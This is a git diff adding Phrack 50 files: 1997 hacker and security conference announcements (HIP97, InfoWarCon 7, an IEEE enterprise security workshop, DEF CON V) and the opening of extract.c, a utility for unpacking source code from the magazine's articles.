+
+
+A do-it-yourself event?
+-----------------------
+
+We will absolutely need your help setting up
+everything once we're there. HIPcamp will open on
+August 5th, three days before HIP starts. If you
+decide to join in that early expect some pretty
+primitive circumstances. If you don't care about that,
+or think that's the best part, you can help build
+HIPnet and all other facilities.
+
+We also urgently need you to think now about what it
+is you would like to see and do at HIP. Just like
+Hacking at the End of the Universe in 1993, we need
+lots of people that have ideas for organizing their
+own small part of HIP and the organizational talent to
+do this without too much help from us.
+
+One of the proven recipes for fun:
+
+* GET a group of friends together in an early stage;
+arrange how you're going to get there if you're far
+away.
+
+* THINK: Is there something you and your friends would
+like to show others, discuss or do there?
+
+* If so: TELL us about it, so we can coordinate, help
+or announce things.
+
+* Maybe BUY a nice big army surplus tent for almost
+nothing.
+
+* BRING lots of computers and other electronics.
+
+* HOOK it all up once you get there.
+
+* Check out what others have been doing and MEET nice
+people, hang out, have fun!
+
+Of course you can also come alone and have lots of
+fun, and there will be a huge exhibition tent to set
+up computers in. In another big tent there will be
+near to a thousand chairs where you can listen to and
+participate with panel discussions.
+
+This event will be big, and as said, in this stage
+we're looking for people to organize their own chaotic
+little part of it. So don't mail us saying "put me on
+the list, I want to be a volunteer" when you could say
+"I'm xxx and I'd like to do yyy." Tell us what you
+need us to do. We could put your workshop or whatever
+it is you'd like to do in one of our announcements and
+on the website, so people can communicate with you
+beforehand. We could make sure there is enough room if
+your project requires a lot of space. You name it.
+
+You can use the newsgroup alt.hacking.in.progress to
+find people to work with at HIP. Or you can use the
+notice board at the website to search for someone to
+travel with to HIP. Use it to ask for help or offer
+some.
+
+As the days get longer, there will be parts of the
+overall organization that need coordination with
+volunteers some time before the actual event (workshop
+coordination, audiovisual stuff, registration-desk,
+bar, network), but now is not yet the time.
+
+This isn't going to be passive entertainment, we all
+work together to make it work. Also: HIP is not the
+event to buy a computer or get advice on buying one,
+and there're not going to be any beginner courses on
+using the Internet. If you're not into networking of
+some sort, you'll think it's boring.
+
+But if you're very technically inclined, part of some
+remote community on the edge of the net, or if the
+politics surrounding information technology are just
+your thing, HIP is definitely made for you (and by
+you, we hope).
+
+HIPcamp will open on August 5th, three days before HIP
+starts. If you decide to join in that early expect pretty
+primitive circumstances. If you don't care about that,
+or think that's the best part, you can help build HIPnet
+and all other facilities.
+
+
+How to stay in contact:
+-----------------------
+
+* Check out the website http://www.hip97.nl/
+* Participate in alt.hacking.in.progress
+* Read the FAQ on the website or the newsgroup
+* Mail us at info@hip97.nl
+
+Snailmail us at:
+
+HIP
+Postbus 1035
+1000 BA  Amsterdam
+Netherlands
+
+Tel. +31 20 5352081
+Fax. +31 20 5352082
+
+
+[=-------------------------------------------------------------------------=]
+
+                       Defensive Information Warfare
+                          And Systems Assurance
+                    For Community, Company and Country
+                           September 11-12, 1997
+                     Sheraton Premier, Tysons Corner, VA
+
+                              Call for Papers
+
+
+         Sponsors:
+         National Computer Security Association
+         http://www.ncsa.com
+and
+         Winn Schwartau, Interpact, Inc.
+         http://www.infowar.com
+         http://www.info-sec.com
+
+         Interested parties from government, law enforcement, academia,
+         corporations and individuals from all nations are invited to submit
+         papers or concepts for papers/presentation to be given at
+         InfoWarCon 7 and published on http://www.infowar.com. The following
+         Solutions Oriented topics are of special interest to the conference,
+         but all papers will be considered:
+
+         Case studies and real world successes are strongly encouraged.
+
+         New technologies, systems, models and approaches to provide higher
+         levels of information and systems assurance in a world where
+         conflict has moved to Cyberspace. (Commercial, Law Enforcement and
+         Government).
+
+              Detect and Response Solutions
+              Denial of Service Methods and Protection
+              New Info-Sec Models for Local and Global Enterprises
+              Demonstrations of New Emerging Technologies
+              Encryption, Access Control, and Identification
+
+         The technical and social convergence of the military, law enforcement
+         and private sectors in the interest of National Security: defensive
+         mechanisms, policies and cooperative efforts.. (Commercial and
+         Government)
+
+              Electronic Civil Defense Policies
+              Alternative National Defense and Intelligence Mechanisms
+              National vs. International Policy Development
+              Educating Populations for Support
+              Dealing with the Non-nation State Actor
+
+         Cooperative legal, ethical and political means by which to interest,
+         create and sustain international cooperation for the discovery and
+         prosecution of computer crimes and cyber-terrorism. (Law enforcement
+         and Government)
+
+              Redefining the State
+              Case Studies of Prosecution; Successful and Not
+              Corporate Vigilantism and Self-Preservation
+              Electronic Bills of Rights for Nation States
+              United Nations of Cyberspace
+              Legal Conundra
+
+         Multi-media presentations, real-time scenarios or gaming, audience
+         participation and highly interactive topics are more likely to be
+         accepted. English is the conference language and all sessions will
+         be unclassified.
+
+         Submissions are to be in Word 6.0 or greater, Powerpoint, or other
+         popular formats, sent by email to: betty@infowar.com
+
+         Submission Deadline: May 16, 1997
+         Acceptance Date: June 9, 1997
+
+         For complete information on attendance:
+         Registration: Conferences@ncsa.com
+         Sponsorships: Sponsors@ncsa.com
+
+Questions/Help:  betty@infowar.com
+
+[=-------------------------------------------------------------------------=]
+
+ 		  Second International Workshop on Enterprise Security
+
+			      June 18-20, 1997
+		    Massachusetts Institute of Technology (MIT),
+			Cambridge, Massachusetts, USA
+		
+		Co-sponsored by the IEEE Computer Society and the
+		Concurrent Engineering Research Center (CERC) at 
+			   West Virginia University
+           
+                          
+==============================================================================
+Enterprises are increasingly dependent on their information systems to
+support their business and workflow activities.  
+There is a need for universal electronic connectivity to support 
+interaction and cooperation between multiple  organizations.  
+This makes enterprise security and confidentiality more important, 
+but more difficult to achieve, as the multiple organizations may 
+have differences in their security policies and may have to interact 
+via an insecure Internet.  These inter-organizational enterprise systems 
+may be very large and so tools and techniques are needed
+to support the specification, analysis and implementation of security.
+
+This workshop will focus on the problems and challenges relating to
+enterprise security in inter-organizational systems. We aim to bring
+together principal players from both the internetwork and enterprise
+security community and will provide plenty of time for discussion.   Topics
+to be addressed include:
+
+	- Internet/Intranet security
+        - Security infrastructure and protocols
+	- Java Security
+	- Specifying and Analyzing Enterprise Security Policy
+        - Role-Based Access Control
+        - Supporting enterprise security over the Internet
+        - Conflicts and harmonization of inter- and intra-organizational
+             Security
+        - Distributed Database Security
+        - Secure Transactions
+        - Security in Workflow Process
+        - Object-Oriented and CORBA Security
+        - Secure Applications and Environments
+        - Integrating Heterogeneous Security Environments
+        - Managing inter-organizational Enterprise Security
+	- Internet Security protocols
+	- Security Algorithms
+
+This workshop will be part of the IEEE Sixth Workshops on Enabling
+Technologies: Infrastructure for Collaborative Enterprises (WET-ICE
+96) organized by the Concurrent Engineering Research Center (CERC)/
+West Virginia University.
+
+Important Dates:
+================
+Papers Due			March 25, 1997
+Panel Proposals			March 18, 1997
+Authors notified of acceptance  April 21, 1997
+Workshop			June 18-20, 1997
+Camera Ready			June 28, 1997
+
+INFORMATION FOR AUTHORS OF PAPERS TO BE INCLUDED IN THE PROCEEDINGS 
+===================================================================
+Mail six copies of an original (not submitted or published elsewhere)
+paper (double-spaced) of 3000-5000 words to one of the PC co-chairs. 
+Include the title of the paper, the name and affiliation of each author, a
+150-word abstract and no more than 8 keywords. The name, position,
+address, telephone number, and if possible, fax number and e-mail
+address of the author responsible for correspondence of the paper must
+be included.
+
+
+An e-mail submission in postscript format will be accepted.
+
+INFORMATION FOR PANEL ORGANIZERS 
+================================
+Send six copies of panel proposals to one of the PC co-chairs. 
+Include the title, a 150-word scope statement, proposed session chair and
+panelists and their affiliations, the organizer's affiliation,
+address, telephone and fax number, and e-mail address.
+
+INFORMATION FOR AUTHORS OF POSITION PAPERS
+==========================================
+Send six copies of position paper of 2-3 pages to one of the PC
+co-chairs. Include the title of the paper, the name and affiliation of
+each author, a 150-word abstract and no more than 8 keywords. The
+name, position, address, telephone number, and if possible, fax number
+and e-mail address of the author responsible for correspondence of the
+paper must be included. An accepted position paper will get less
+presentation time than full paper.  
+
+Workshop General Chair and Organizer
+====================================
+	Yahya Al-Salqan, Ph.D.
+	Sun Microsystems
+	
+	alsalqan@eng.sun.com
+
+Program Committee
+=================
+
+Program Committee Co-Chairs
+==========================
+	Barbara C. Davis
+	Director of Technology
+	The Applied Knowledge Group
+	231 Market Place, #315
+	San Ramon, CA  94583-2785
+	USA
+
+	Tel. (888) 442-2785
+	FAX  (510) 275-9695
+	bcdavis@appliedknowledge.com
+
+	Douglas Moughan
+	National Security Agency, R23
+	9800 Savage Rd.
+	Ft. Meade, Maryland 20755-6000
+	USA
+
+	wdm@tycho.ncsc.mil
+
+
+
+Workshop Program Committee (Partial List):
+==========================================
+Abdallah Abdallah, Birzeit University, Jerusalem
+Takasi Arano, NTT Corp, Japan
+Germano Caronni, ETH-Zurich, Switzerland
+Taher ElGamal, Netscape Corp., USA
+Stephen Farrell, Software and Systems Engineering, Ireland
+Takeo Hamada, Fujitsu, Japan
+Matthias Hirsch, BSI (Federal Department of Security in the Information
+	Technology-Germany
+Cynthia L Musselman, Sandia Lab, USA
+Lisa Pretty, Certicom Corp., Canada
+Jeffrey Parrett, LLNL, USA
+Sumitra Reddy, West Virginia University, USA
+Nahid Shahmehri, Linkoping University, Sweden
+Morris Sloman, Department of Computing: Imperial College, UK
+Badie Taha, Al-Quds University, Jerusalem
+Robert Thomys, BSI (Federal Department of Security in the Information
+	Technology-Germany
+Tatu Ylonen, SSH Communication Security, Finlad
+Nick Zhang, EIT, USA
+
+
+
+Internet Hot-line
+================= 
+
+Information on Enterprise Security Workshop may be obtained through
+the WWW using the URL http://www.cerc.wvu.edu/SECWK/ 
+
+For more information on WET-ICE'97, visit the URL: 
+http://www.cerc.wvu.edu/WETICE/WETICE97.html
+
+One does not need to have a paper to attend the workshop.  
+
+[=-------------------------------------------------------------------------=]
+
+
+-----BEGIN PGP SIGNED MESSAGE-----
+
+READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIB
+
+            DEF CON V Convention Announcement #1.08 (04.09.97)
+         July 11-13th @ the Aladdin Hotel and Casino in Las Vegas
+
+    XXXXXXXXXXXXXXXXXXXXXXXX XX      DEF CON V Convention Announcement
+    XXXXXXXxxxxXXXXXXXXXXXXXXX XX    DEF CON V Convention Announcement
+    XXXXXXxxxxxxXXXXXX  X    X       DEF CON V Convention Announcement
+    XXXXXxxxxxxxxXXXXXXX  X          DEF CON V Convention Announcement
+    XXXXxxxxxxxxxxXXXX XXXXXXXXX     DEF CON V Convention Announcement
+    XXXxxxxxxxxxxxxXXXXXXXXXX X      DEF CON V Convention Announcement
+    XXxxxxxxxxxxxxxxXXXXXX  XX  X    DEF CON V Convention Announcement
+    XXXxxxxxxxxxxxxXXXXXXXX          DEF CON V Convention Announcement
+    XXXXxxxxxxxxxxXXXXXXXX X XX      DEF CON V Convention Announcement
+    XXXXXxxxxxxxxXXXXXXXXXX  XX X    DEF CON V Convention Announcement
+    XXXXXXxxxxxxXXXXXXXXX X          DEF CON V Convention Announcement
+    XXXXXXXxxxxXXXXXXXXXXXXXXX       DEF CON V Convention Announcement
+    XXXXXXXXXXXXXXXXXXXXXXXXXXXX X   DEF CON V Convention Announcement
+
+READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIB
+
+                    The only convention with free beer!
+
+IN
+SHORT:--------------------------------------------------------------------
+
+        WHAT: Speakers and partying in Vegas for all hackers
+        WHEN: July 11th - 13th
+        WHERE: Las Vegas, Nevada @ the Aladdin Hotel and Casino
+        COSTS: $30 in advance, $40 at the door
+        MORE INFO: http://www.defcon.org or email info@defcon.org
+
+IN
+LONG:---------------------------------------------------------------------
+
+It's time to brave Las Vegas again for DEF CON!  This is an initial
+announcement and invitation to DEF CON V, a convention for the
+"underground"
+elements of the computer culture.  We try to target the (Fill in your
+favorite word here): Hackers, Phreaks, Hammies, Virii Coders, Programmers,
+Crackers, Cyberpunk Wannabees, Civil Liberties Groups, CypherPunks, 
+Futurists, Artists, Criminally Insane, Hearing Impaired.  It seems that
+books about the culture are becoming more popular, so of course reporters
+are also welcome.  You won't be hurt.  I promise.  Just bring cash for
+drinks.
+
+So you heard about DEF CON IV, and want to hit part V?  You heard about the
+parties, the info discussed, the bizarre atmosphere of Las Vegas and want
+to
+check it out in person?  You want to do weird shit _away_ from the hotel
+where you can't get me in trouble?  You have intimate knowledge of the
+SWIFT
+network, and want to transfer millions of dollars to the Def Con account?
+Then you're just the person to attend!
+
+What DEF CON is known for is the open discussion of all ideas, the free 
+environment to make new contacts and the lack of ego.  More people have
+made
+great friends at DEF CON over the years than my brain can conceive of.  DEF
+CON is also known for letting the "Suits" (Government / Corporate) mix with
+everyone and get an idea of what the scene is all about.  The media makes
+an
+appearance every year and we try to educate them as to what is really going
+on.  Basically it has turned into the place to be if you are at all
+interested in the computer underground.
+
+[Note]----------------------------------------------------------------------
+-
+
+Now last year over 800 people showed up and threw my whole program for a
+loop.  I was thinking 500+ people, but when 800 showed up it got a little
+crazy for the planning staff.  This year I am planning for 1,000.  This
+way I will be able to accommodate everyone and have less logistical screw-
+ups.
+
+I would also like to apologize to everyone last year who had temporary
+badges for half the convention, etc.  I will do all that is possible for 
+maximum coolness, and minimum hassles.   Anyway, enough of my shit, on with
+the details.
+
+[End
+Note]-------------------------------------------------------------------
+
+SPEAKERS:-------------------------------------------------------------------
+-
+
+Over the years DEF CON has had many notable speakers.  This year there will
+be more of an emphasis on technical talks.  There will be a separate
+smaller
+room for break-out sessions of more specific topics.  While the talks of
+the
+past have been great, it always seems some tech people drop out and general
+talks fill in.  I will load it tech heavy so when people do drop out there
+will still be plenty of meat left for the propeller heads.
+
+There will be some speaking on Friday evening before Hacker Jeopardy, all
+day Saturday and Sunday.  About 20 people will speak, plus smaller tech 
+sessions.  If you are interested in speaking or demonstrating something
+please contact me.
+
+Current speakers include:
+
+[> If you are interested in speaking please contact me at 
+   dtangent@defcon.org
+
+[> Nihil - Windows NT (in)security.  The challenge response system, NT 5.0
+   Kerb security services, man in the middle attacks on domain controllers.
+   This will be a more technical discussion of NT related security.
+
+[> Koresh - Hacking Novell Netware.
+
+[> Yobie - Emerging infrastructures made possible by Java.  He will describe
+   and talk about Java as the foundation for a global, object-oriented
+   distributed network.  New concepts and computing paradigms will discussed
+   as well as applications for both applications development or straight-out
+   hacking.   
+
+[> Mudge - System Administrator for L0pht Heavy Industries.  He will present
+   a technical talk on something cool.
+
+[> Clovis - From the Hacker Jeopardy winning team.  He will discuss issues
+   with security and networked object systems, looking at some of the
+   recent security issues found with activeX and detail some of the
+   potentials and problems with network objects. Topics will include
+   development of objects, distributed objects, standards, activex, corba,
+   and hacking objects.
+
+[> Bruce Schneier - Author of Applied Cryptography and the Blowfish
+   algorithm - Why cryptography is harder than it looks.
+
+[> FBI Computer Crime Squad - They will make another appearance this year
+   only if I can bribe them with the audio from last years convention.  Can
+   I do it in time?
+
+[> Richard Thieme - "The Dynamics of Social Engineering: a cognitive map for
+   getting what you need to know, working in networks, and engaging in
+   espionage quietly; the uses of paranoia, imagination, and grandiosity
+   to build the Big Picture.
+
+[> G. Gillis - Packet Sniffing:  He will define the idea, explain everything
+   from 802.2 frames down to the TCP datagram, and explain the mechanisms
+   (NIT, bpf) that different platforms provide to allow the hack.
+
+[> Seven - What the feds think of us.
+
+[> RK - Electronic countermeasures, counter espionage, risk management.
+   Should include a demonstration of electronic countermeasures equipment
+   as well as a talk on what works, what doesn't, and the industry.
+
+[> Tom Farley the Publisher of the "Private Line" journal, and Ken
+   Kumasawa of TeleDesign Management - Toll Fraud in the 90s: Two
+   perspectives. An overview of phreaking from a hackers point of view and
+   an industry/security consultants point. 
+
+[> Michael Quattrocchi - The future of digital cash and a presentation about
+   the modernization and state of register-level debit cards; in effect
+   currently throughout Canada.
+
+[> Ira Winkler - NCSA - Real life case studies of successful and
+   unsuccessful corporate espionage.  
+
+
+SCHEDULE:-------------------------------------------------------------------
+-
+
+FRIDAY:  Network Setup, Sign in, Informal PGP Keysigning at the "PGP
+table",
+Lots of Partying.  Capture the Flag Contest Starts at 16:00
+
+On Friday there will be the demonstrations of the Radio Burst Cannon, a
+"real" rail gun, and an omni-directional cell phone jammer.  Times to be
+announced.
+
+10:00 -      Doors open, sign in starts
+10:00 -      Movies start in main conference room
+16:00 -      Capture the Flag II starts
+
+Breakout Tech Sessions:
+
+19:00 -      Tech Talks starts in break out room
+
+24:00 (Midnight) Hacker Jeopardy Starts.
+
+SATURDAY: 
+
+Speakers from 10:00 to 19:00  This is _NOT_ the order they will speak in.
+
+10:00 - 10:50 Keynote (?)
+11:00 - 11:50 Bruce Schneier
+12:00 - 12:50 Yobie
+13:00 - 13:50 Clovis
+14:00 - 14:50 FBI Computer Crime Squad
+15:00 - 15:50 Richard Theme
+16:00 - 16:50 Seven
+17:00 - 17:50 RK
+18:00 - 18:50 Tom Farley
+
+Breakout Tech Sessions:
+
+Nihil
+Koresh
+Mudge
+Weld Pond
+G. Gillis
+
+24:00 (Midnight) Final rounds of Hacker Jeopardy.
+
+SUNDAY:
+
+Speakers from 10:00 to 16:00 This is _NOT_ the order they will speak in.
+
+10:00 - 10:50 Michael Q.
+11:00 - 11:50 Ira Winkler
+12:00 - 12:50
+13:00 - 13:50
+14:00 - 14:50
+15:00 - 15:50
+
+
+Breakout Tech Sessions:
+
+
+
+16:00          Awards for Capture the Flag
+	       End of it all, cleanup, etc.  See you all next year!
+
+EVENTS:---------------------------------------------------------------------
+-
+
+[>     HACKER JEOPARDY:
+
+       Winn is back with Hacker Jeopardy!!  The third year in the running!
+       Can the all-powerful Strat and his crypto-minion Erik, whose force
+       cannot be contained, be defeated?!  Will the powers that be allow
+       Strat-Meister to dominate this beloved event for the third year in
+       a row?!  Can Erik continue to pimp-slap the audience into submission
+       with a spoon in his mouth?!?  Only Skill, Time, and booze will tell
+       the tail!
+
+       The Holy Cow will help supply the beer, you supply the answers.
+       The first round starts at 12 midnight o'clock on Friday and lasts
+       until it is done.  The second and secret rounds will happen Saturday
+       at midnight.
+
+       6 teams will be picked at random and compete for the final round.
+       There can be only one!  Strat's Team, the winners from last year
+       will defend if all the members can be found.
+
+[>     FREE BEER!
+       
+       Holy Cow will provide free beer tickets!  If you are over 21 prepare
+       to consume "hacker" beers.  Actually it's whatever beer they have on
+       tap, but it's the best beer in Las Vegas.  Follow Las Vegas Blvd. up
+       until you see the florescent cow with the big sunglasses.  All taxi 
+       drivers know of this Mecca.  Over 1,000 free beers in all!
+
+[>     BLACK AND WHITE BALL:
+
+       We've talked it over, and the verdict is in.  For the last two years
+
+       at DEF CON there has been a sort of unspoken Saturday night dress up
+       event.  People have worn everything from party dresses and Tuxedoes 
+       to AJ's ultra pimp Swank outfit with tiger print kilt.  This year it
+       is official.  Wear your cool shit Saturday night, be it gothic or
+PVC
+       vinyl or Yakuza looking black MIBs.  No prizes, just your chance to 
+       be the uber-bustah pimp.
+      
+[>     THE TCP/IP DRINKING GAME:
+
+       If you don't know the rules, you'll figure 'em out.
+
+[>     CAPTURE THE FLAG:
+       The second year of capture the flag is back. With the lessons
+learned
+       from last year the contest should be more interesting and intense.
+       Up to six machines will be connected running different operating
+       systems.  The object is to control as many machines as possible at
+       certain time periods.  You can form teams or go it lone star.  There
+       will be valuable cash prizes and redeemable coupons for those who
+       come in first and second, plus various runner up stuffs.  
+
+       Four protocols (TCP/IP, NetBeui, IPX, and x.25!  Yes, you heard
+       right, x.25) and three segments with 2 boxes per segment.  Pick your
+       segment, protect your boxes.  At all times you must have a WWW
+       server (port 80), finger, and mail working.  There will be several
+       stock operating systems on the network including linux, FreeBsd,
+       Windows NT, Novell, Some Apple System 7.x, and who knows what else.
+
+       More specifics as time goes on.
+
+[>     VIRTUAL WORLD:
+
+       We are working on the group discounts like the last two years.
+
+[>     QUAKE COMPETITION:
+
+       http://www.ctive.com/ntech/defcon.htm
+
+       This year knightPhlight contacted me and wanted to organize a single
+       elimination Quake competition to find out who that badest ass 'mo
+'fo
+       is.  Check out the web site to get the rules, sign up, or to
+       donate a computer the greater good of destruction.
+
+       It is IMHO that Quake by id Software rules 3D action gaming. But who
+       rules Quake?  We'll find out this July 11th-13th at the DefCon
+       Conference in Las Vegas. This isn't going to be a networked game
+       intent on quickly eliminating as many players as possible in a
+single
+       round. Rather, one-on-one games will be played to absolutely
+       determine who the best really is.
+
+       Of course, you already know your the best so why would you feel
+       obligated to prove it? Because we'll give the first place winner
+       $750. Now, being the wily person you are, I bet you would like to
+       know where I got the money for the prizes. It'll come from your
+       registration fee of $7.50.  Any half wit can do the math and see the
+       10,000% return for the winner. But just for entering you'll be in a
+       drawing for really kewl stuff. If you don't think its kewl you can
+       just give us your email address and we'll be happy to send you a
+       couple hundred thousand messages explaining why the prizes are
+great.
+
+[>     NET CONNECTION:
+
+       This year we are pre-building many of the network boxes so the net
+       can go up first thing Friday.  It looks like we will have a T1 line
+       and we will break it out to 10 BaseT hubs.  If you want in on the 
+       network bring along the appropriate cables and adapters.
+
+       More Net Madness!  The T1 bandwidth will allow us to do the 
+       following cool stuff:
+
+       - Have several color quickcams and a CU-SeeMe reflector site set
+       up so people not at the con can check out what's going on.  During
+       the convention check out the DEF CON web site to get the location
+       of the reflector site.  You should get and install the software
+       needed to view CU-SeeMe streams in advance!
+
+       - Have a RealAudio server set up to stream the speakers talks to
+       those who can not attend.
+
+       - Potentially play a competitive multi user game(s) over the net.
+
+       NOTE!  If you wish to participate interactively with the convention
+       please e-mail me and we can coordinate something.  It would be
+       great to get people from all over the world involved.
+
+[>     5th ANNUAL SPOT THE FED CONTEST:
+
+       The ever popular paranoia builder.  Who IS that person next to you?
+
+       "Like a paranoid version of pin the tail on the donkey, the
+       favorite sport at this gathering of computer hackers and phone
+       phreaks seems to be hunting down real and imagined telephone
+       security and Federal and local law enforcement authorities who the
+       attendees are certain are tracking their every move.. .. Of course,
+       they may be right."
+                                                       - John Markhoff, NYT
+
+       Basically the contest goes like this:  If you see some shady MIB
+       (Men in Black) earphone penny loafer sunglass wearing Clint Eastwood
+       to live and die in LA type lurking about, point him out.  Just get
+       my attention and claim out loud you think you have spotted a fed.
+       The people around at the time will then (I bet) start to discuss the
+       possibility of whether or not a real fed has been spotted.  Once
+       enough people have decided that a fed has been spotted, and the
+       Identified Fed (I.F.) has had a say, and informal vote takes place,
+       and if enough people think it's a true fed, or fed wanna-be, or
+       other nefarious style character, you win a "I spotted the fed!"
+       shirt, and the I.F. gets an "I am the fed!" shirt.
+
+       NOTE TO THE FEDS:  This is all in good fun, and if you survive
+       unmolested and undetected, but would still secretly like an "I am
+       the fed!" shirt to wear around the office or when booting in doors,
+       please contact me when no one is looking and I will take your
+       order(s).  Just think of all the looks of awe you'll generate at
+       work wearing this shirt while you file away all the paperwork
+       you'll have to produce over this convention.  I won't turn in any
+       feds who contact me, they have to be spotted by others.
+
+[>     RAIL GUN DEMONSTRATION: (Friday)
+
+       On Friday afternoon there will be a demonstration of a hand held
+       rail gun.  This garage project should be able to fire a graphite
+       washer very, very fast.
+
+[>     OMNIDIRECTIONAL CELL PHONE JAMMER DEMONSTRAITON: (Friday)
+
+       Another interesting creation to be tested on Friday in the desert.
+       Come along and watch you cell phone antenna explode with power!
+       See control channels crumble before you.
+
+[>     RADIO BURST CANNON DEMONSTRATION: (Friday)
+
+       While not quite a HERF gun, this should come close.  The RBC should
+       be able to produce up to or less than one MegaWatt for up to or less
+       than one second.  What will this do?  Who knows!  Come and find out.
+       Obviously the above demonstrations will take place away from the 
+       local hospitals and casinos out in the desert someplace, so be
+       prepared.
+
+
+HOTELS:---------------------------------------------------------------------
+-
+
+[> Book your room NOW!!!  We have a block of rooms, but it is first come,
+[> first served.  Rooms get released about one month before the convention.
+[> Book by June 9th or risk it.  The room rates are quite cool this year.
+
+
+       PRIMARY HOTEL: The Aladdin Hotel and Casino
+       3667 Las Vegas Blvd. South, Las Vegas, Nevada
+       Built in 1966 it is one of the oldest hotels in Las Vegas that
+       hasn't been blown up to make room for newer ones.  It is quite nice
+       and has Tennis courts, two swimming pools, Chinese, Vietnamese and
+       Korean.  A Seafood and steakhouse, Joe's Diner and a 24 hour coffee
+       shop too.  It's located next to the MGM Theme park on the strip.
+
+       PHONE: 1-800-225-2632, reference the "DC Communications conference"
+       for reservations.
+
+       RATES: Single & Double rooms are $65 in the Garden section, $85 for
+       the Tower.  Suites are $250 to $350.  All costs are plus 8% room
+tax.
+       Rollaway beds are available for an additional $15 a night.
+
+
+STUFF IN
+VEGAS:--------------------------------------------------------------
+
+URLs
+
+	Listings of other hotels in Las Vegas, their numbers, WWW pages, etc.
+	http://www.intermind.net/im/hotel.html
+	http://vegasdaily.com/HotelCasinos/HotelAndCasinos/CasinoList.html
+
+VENDORS / SPONSORS /
+RESEARCH:-----------------------------------------------
+
+        If you are interested in selling something (shirts, books,
+        computers, whatever) and want to get a table contact me for costs.
+
+        If you have some pet research and you want to have the participants
+        fill out anonymous questioners please contact me for the best way
+        to do this.
+
+        If you want to sponsor any event or part of DEF CON V in return for
+        favorable mentions and media manipulation please contact me.  For
+        example in the past Secure Computing has sponsored a firewall
+        hacking contest.
+
+MORE
+INFO:-------------------------------------------------------------------
+
+ [>     DEF CON Voice Bridge (801) 855-3326 
+
+        This is a multi-line voice bbs, VMB and voice conference system.
+        There are 5 or so conference areas, with up to eight people on each
+        one.  Anyone can create a free VMB, and there are different voice
+        bbs sections for separate topics.  This is a good neutral meeting
+        place to hook up with others.
+
+        The Voice bridge will be changing numbers soon, but the old number
+        will refer you to the new location.  The new spot won't suffer from
+        "Phantom" bridges!
+
+ [>     MAILING LIST
+
+        send emial to majordomo@merde.dis.org and in the body of the
+message 
+        include the following on a separate line each.
+
+        subscribe dc-stuff
+
+        dc-announce is used for convention updates and major announcements,
+        dc-stuff is related to general conversation, planning rides and
+        rooms, etc.
+
+ [>     WWW Site http://www.defcon.org/
+
+        Convention updates and archives from previous conventions are
+housed
+        here.  Past speakers, topics, and stuff for sale.  Also a growing
+        section of links to other places of interest and current events.
+
+ [>	The Third Annual California Car Caravan to DEF CON!
+        http://exo.com/~enigma/caravan/
+
+ [>     The DEF CON V Car ride sharing page:  Use this site to arrange ride
+        sharing to the convention from all over North America.  If you can 
+        spare a seat for someone, or need to leech a ride go to the ride
+        sharing page set up by Squeaky.
+        http://www.geocities.com/ResearchTriangle/4955/defcon.html
+
+        Room Sharing Page:
+        
+ [>     EMAIL dtangent@defcon.org
+
+        Send all email questions / comments to dtangent@defcon.org.  It has
+        been said that my email is monitored by various people.  If you
+want
+        to say something private, please do so with my pgp key (At the 
+        bottom of this announcement)  I usually respond to everything, if
+        not I'm swamped or had a system problem.
+
+ [>     SNAIL MAIL
+
+        Send all written materials, pre-registrations, etc. to:
+        DEF CON, 2709 E. Madison, Seattle WA, 98112
+        If you are pre-registering for $30 please make payable to DEF CON
+        and include a name to which you want the registration to apply.
+        I don't respond to registrations unless you request.
+
+DO YOU WANT TO
+HELP?---------------------------------------------------------
+
+        Here is what you can do if you want to help out or participate in
+        some way:
+
+        Donate stuff for the continuous give-aways and the various
+contests.
+        Got extra ancient stuff, or new cool stuff you don't use anymore?
+        Donate it to a good cause!  One person was very happy over winning
+        an osborne "portable" computer.
+
+        ORGANIZE sharing a room or rides with other people in your area.
+        Join the mailing list and let people know you have floor space or
+        some extra seats in your car.  Hey, what's the worst that can
+        happen besides a trashed hotel room or a car-jacking?
+
+        CREATE questions for hacker jeopardy (you know how the game is
+        played) and email them to winn@infowar.com.  No one helped out last
+        year, so this year let's try.  Everything from "Famous narks" to
+        "unix bugs" is fair game.
+
+        BRING a machine with a 10bt interface card, and get on the local
+        network, trade pgp signatures, etc.
+
+FINAL CHECK LIST OF STUFF TO
+BRING:------------------------------------------
+
+MY PGP
+KEY:------------------------------------------------------------------
+
+- -----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.1
+
+mQCNAy6v5H8AAAEEAJ7xUzvdRFMtJW3CLRs2yXL0BC9dBiB6+hAPgBVqSWbHWVIT
+/5A38LPA4zqeGnGpmZjGev6rPeFEGxDfoV68voLOonRPcea9d/ow0Aq2V5I0nUrl
+LKU7gi3TgEXvhUmk04hjr8Wpr92cTEx4cIlvAeyGkoirb+cihstEqldGqClNAAUR
+tCZUaGUgRGFyayBUYW5nZW50IDxkdGFuZ2VudEBkZWZjb24ub3JnPg==
+=ngNC
+- -----END PGP PUBLIC KEY BLOCK-----
+
+-----BEGIN PGP SIGNATURE-----
+Version: 2.6.2
+
+iQCVAwUBM07aS8tEqldGqClNAQFuSAQAjwGLBdDKA9TKTNAxewgeluvRXPFu+cLf
+hQ74qJFtGybyik+Te4FPQI3Uw+wjir/4ES1imyjQ9n9oIOh+E0L3moYxbcQKN7iT
+/VWAJXwPNJR8guxGcrRNYO85KXSB2qFrU9JwCwJ/8C5lEi/5FVjqRewpliw68+SW
+9jHqxFccQUs=
+=PPpy
+-----END PGP SIGNATURE-----
+
+EOF
diff --git a/phrack50/16.txt b/phrack50/16.txt
new file mode 100644
index 0000000..20dd62b
--- /dev/null
+++ b/phrack50/16.txt
@@ -0,0 +1,88 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                     16 of 16
+
+                      extract.c by Phrack Staff and sirsyko
+
+
+---------------------8<------------CUT-HERE----------->8---------------------
+ 
+/*  extract.c by Phrack Staff and sirsyko 
+ *
+ *  Phrack Magazine, 1997 
+ *
+ *  Extracts textfiles from a specially tagged flatfile into a hierarchical 
+ *  directory strcuture. Use to extract source code from any of the articles 
+ *  in Phrack Magazine (first appeared in Phrack 50).
+ *
+ *  gcc -o extract extract.c
+ *  
+ *  ./extract filename   
+ * 
+ */   
+
+ 
+#include <stdio.h>
+#include <sys/stat.h>
+#include <string.h>
+
+int main(int argc, char **argv){ 
+
+    char *s="<++> ",*e="<-->",b[256],*bp; 
+    FILE *f,*o = NULL; 
+    int l, n, i=0; 
+
+    l = strlen(s); 
+    n = strlen(e); 
+
+    if(argc<2) {
